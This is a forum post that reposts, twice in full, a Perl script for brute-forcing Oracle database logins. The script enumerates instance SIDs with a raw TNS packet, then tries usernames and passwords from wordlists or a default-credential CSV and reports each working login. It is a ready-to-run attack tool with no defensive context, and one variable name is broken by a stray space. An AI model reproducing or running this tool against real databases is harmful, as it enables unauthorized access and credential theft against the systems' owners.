M4tRix
11-17-2009, 01:35 AM
#!/usr/bin/perl
# Fri Feb 4 18:41:54 CET 2005 <dab@digitalsec.net>
# Brute force for Oracle databases.
# !dSR - www.digitalsec.net
use DBI;
use IO::Socket;
use strict;
use Getopt::Long;
Getopt::Long::config qw(no_ignore_case);
$|=1;
my $total = 0;
my ($host,$user,$passwd,$debug,$tout,$list,$ufile,$pf ile);
my (@SIDS,@sidz,%seen);
my $stime = time();
my $opts = GetOptions( 'host:s' => $host, 'user:s' => $user,
'passwd:s' => $passwd, 'debug:i' => $debug,
'tout:i' => $tout, 'list:s' => $list,
'Ufile:s' => $ufile, 'Pfile:s' => $pfile);
my ($ip,$port) = split(/:/,$host);
# Default options
$port = "1521" if ! $port;
$tout = "10" if ! $tout;
# Help if bad argument (TODO: change this)
&help unless $opts;
if (!$host) { &help }
if ((!$user && !$ufile) && !$list) { &help }
if ((!$passwd && !$pfile) && (!$list)) { &help }
if ($ufile && $user) { &help }
if ($pfile && $passwd) { &help }
if (($ufile || $user) && $list ) { &help }
if (($pfile || $passwd) && $list ) { &help }
# Packet to get SIDs
my (@packet) = (
0x00, 0x5b, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0x21, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x28, 0x43, 0x4F, 0x4E, 0x4E, 0x45,
0x43, 0x54, 0x5F, 0x44, 0x41, 0x54, 0x41, 0x3D,
0x28, 0x43, 0x4F, 0x4D, 0x4D, 0x41, 0x4E, 0x44,
0x3D, 0x73, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65,
0x73, 0x29, 0x29
);
print "!dSR - Oracle bruteforce by <dab\@digitalsec.net>\n";
print "Trying to connect: $ip:$port ($tout secs)\n";
my ($sendbuf) = pack("C*", @packet);
my ($socket) = IO::Socket::INET->new(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
Timeout => $tout) || die "Can't connect to: $ip:$port - $!\n";
$socket->autoflush(1);
print $socket "$sendbuf";
while(<$socket>){
print "$_\n" if $debug;
push(@sidz,"$1") while /INSTANCE_NAME=(.*?))/g;
};
close($socket);
#get uniq SIDs
@SIDS = grep { ! $seen{$_} ++ } @sidz;
print "Working...\n";
foreach my $sid (@SIDS) {
print "SID: $sid\n" if $debug;
if ($sid eq "PLSExtProc") { print "Skipping $sid\n" if $debug; next; }
# brbrbrb!
if ($ufile) {
open U, "$ufile" or die "Can't open user file $ufile : $!";
while (<U>) {
chomp($_);
$user = $_;
if ($pfile)
{
open P, "$pfile" or die "Can't open passwd file: $pfile : $!";
while (<P>)
{
chomp($_);
$passwd = $_;
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
close (P);
} else
{
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
}
close (U);
} else {
if ($pfile)
{
open P, "$pfile" or die "Can't open passwd file: $pfile : $!";
while (<P>)
{
chomp($_);
$passwd = $_;
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
close (P);
} else
{
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
}
if ($list) {
open CSV, "$list" or die "Can't open csv file $list : $!";
while (<CSV>) {
my($a,$b,$user,$passwd)=split /,/,$_;
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
close (CSV);
}
}
# stats
my $ftime = time();
my $time = $ftime - $stime;
print "Finished: ($total) users found. ($time secs)\n";
# EOF
# Returns 0 if is valid passwd and 1 if isn't
sub orabf {
my $ec = 0;
my ($ip,$sid,$port,$user,$passwd)=@_;
my $dbh = DBI->connect("dbi:Oracle:host=$ip;sid=$sid;port=$port", "$user", "$passwd", { RaiseError => 0, PrintError => 0}) or $ec = "1";
return $ec;
}
# help, heh
sub help {
print "!dSR - Oracle bruteforce by <dab\@digitalsec.net>\n";
print "usage: $0 -h <host[:port]> <[-u <user> | -U <file>] [-p <passwd> | -P <file>] [-l <file>]> [-t <n>] [-d <1|0>]\n";
print "options:\n";
print " -h, --host <host[:port]>\thost and optional port (default: 1521)\n";
print " -u, --user <user>\t\tusername\n";
print " -U, --Ufile <file>\t\tfile with users list\n";
print " -p, --passwd <passwd>\t\tpassword\n";
print " -P, --Pfile <file>\t\tfile with passwords list\n";
print " -l, --list <file>\t\tCSV* file with user/passwd list\n";
print " -t, --tout <n>\t\tconnection timeout (default: 10)\n";
print " -d, --debug <1|0>\t\tenable debug (default: 0)\n";
print "(*)last CSV file at:www.petefinnigan.com/default/oracle_default_passwords.csv\n";
exit 0
}
# Fri Feb 4 18:41:54 CET 2005 <dab@digitalsec.net>
# Brute force for Oracle databases.
# !dSR - www.digitalsec.net
use DBI;
use IO::Socket;
use strict;
use Getopt::Long;
Getopt::Long::config qw(no_ignore_case);
$|=1;
my $total = 0;
my ($host,$user,$passwd,$debug,$tout,$list,$ufile,$pf ile);
my (@SIDS,@sidz,%seen);
my $stime = time();
my $opts = GetOptions( 'host:s' => $host, 'user:s' => $user,
'passwd:s' => $passwd, 'debug:i' => $debug,
'tout:i' => $tout, 'list:s' => $list,
'Ufile:s' => $ufile, 'Pfile:s' => $pfile);
my ($ip,$port) = split(/:/,$host);
# Default options
$port = "1521" if ! $port;
$tout = "10" if ! $tout;
# Help if bad argument (TODO: change this)
&help unless $opts;
if (!$host) { &help }
if ((!$user && !$ufile) && !$list) { &help }
if ((!$passwd && !$pfile) && (!$list)) { &help }
if ($ufile && $user) { &help }
if ($pfile && $passwd) { &help }
if (($ufile || $user) && $list ) { &help }
if (($pfile || $passwd) && $list ) { &help }
# Packet to get SIDs
my (@packet) = (
0x00, 0x5b, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0x21, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x28, 0x43, 0x4F, 0x4E, 0x4E, 0x45,
0x43, 0x54, 0x5F, 0x44, 0x41, 0x54, 0x41, 0x3D,
0x28, 0x43, 0x4F, 0x4D, 0x4D, 0x41, 0x4E, 0x44,
0x3D, 0x73, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65,
0x73, 0x29, 0x29
);
print "!dSR - Oracle bruteforce by <dab\@digitalsec.net>\n";
print "Trying to connect: $ip:$port ($tout secs)\n";
my ($sendbuf) = pack("C*", @packet);
my ($socket) = IO::Socket::INET->new(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
Timeout => $tout) || die "Can't connect to: $ip:$port - $!\n";
$socket->autoflush(1);
print $socket "$sendbuf";
while(<$socket>){
print "$_\n" if $debug;
push(@sidz,"$1") while /INSTANCE_NAME=(.*?))/g;
};
close($socket);
#get uniq SIDs
@SIDS = grep { ! $seen{$_} ++ } @sidz;
print "Working...\n";
foreach my $sid (@SIDS) {
print "SID: $sid\n" if $debug;
if ($sid eq "PLSExtProc") { print "Skipping $sid\n" if $debug; next; }
# brbrbrb!
if ($ufile) {
open U, "$ufile" or die "Can't open user file $ufile : $!";
while (<U>) {
chomp($_);
$user = $_;
if ($pfile)
{
open P, "$pfile" or die "Can't open passwd file: $pfile : $!";
while (<P>)
{
chomp($_);
$passwd = $_;
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
close (P);
} else
{
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
}
close (U);
} else {
if ($pfile)
{
open P, "$pfile" or die "Can't open passwd file: $pfile : $!";
while (<P>)
{
chomp($_);
$passwd = $_;
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
close (P);
} else
{
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
}
if ($list) {
open CSV, "$list" or die "Can't open csv file $list : $!";
while (<CSV>) {
my($a,$b,$user,$passwd)=split /,/,$_;
my $ec = &orabf($ip,$sid,$port,$user,$passwd);
if ($ec == 0) {
print "WOOP: $sid\@$user/$passwd - $ip:$port\n";
$total++;
} else {
print "NO DONUT: $user/$passwd - $ip:$port\n" if $debug;
}
}
close (CSV);
}
}
# stats
my $ftime = time();
my $time = $ftime - $stime;
print "Finished: ($total) users found. ($time secs)\n";
# EOF
# Returns 0 if is valid passwd and 1 if isn't
sub orabf {
my $ec = 0;
my ($ip,$sid,$port,$user,$passwd)=@_;
my $dbh = DBI->connect("dbi:Oracle:host=$ip;sid=$sid;port=$port", "$user", "$passwd", { RaiseError => 0, PrintError => 0}) or $ec = "1";
return $ec;
}
# help, heh
sub help {
print "!dSR - Oracle bruteforce by <dab\@digitalsec.net>\n";
print "usage: $0 -h <host[:port]> <[-u <user> | -U <file>] [-p <passwd> | -P <file>] [-l <file>]> [-t <n>] [-d <1|0>]\n";
print "options:\n";
print " -h, --host <host[:port]>\thost and optional port (default: 1521)\n";
print " -u, --user <user>\t\tusername\n";
print " -U, --Ufile <file>\t\tfile with users list\n";
print " -p, --passwd <passwd>\t\tpassword\n";
print " -P, --Pfile <file>\t\tfile with passwords list\n";
print " -l, --list <file>\t\tCSV* file with user/passwd list\n";
print " -t, --tout <n>\t\tconnection timeout (default: 10)\n";
print " -d, --debug <1|0>\t\tenable debug (default: 0)\n";
print "(*)last CSV file at:www.petefinnigan.com/default/oracle_default_passwords.csv\n";
exit 0
}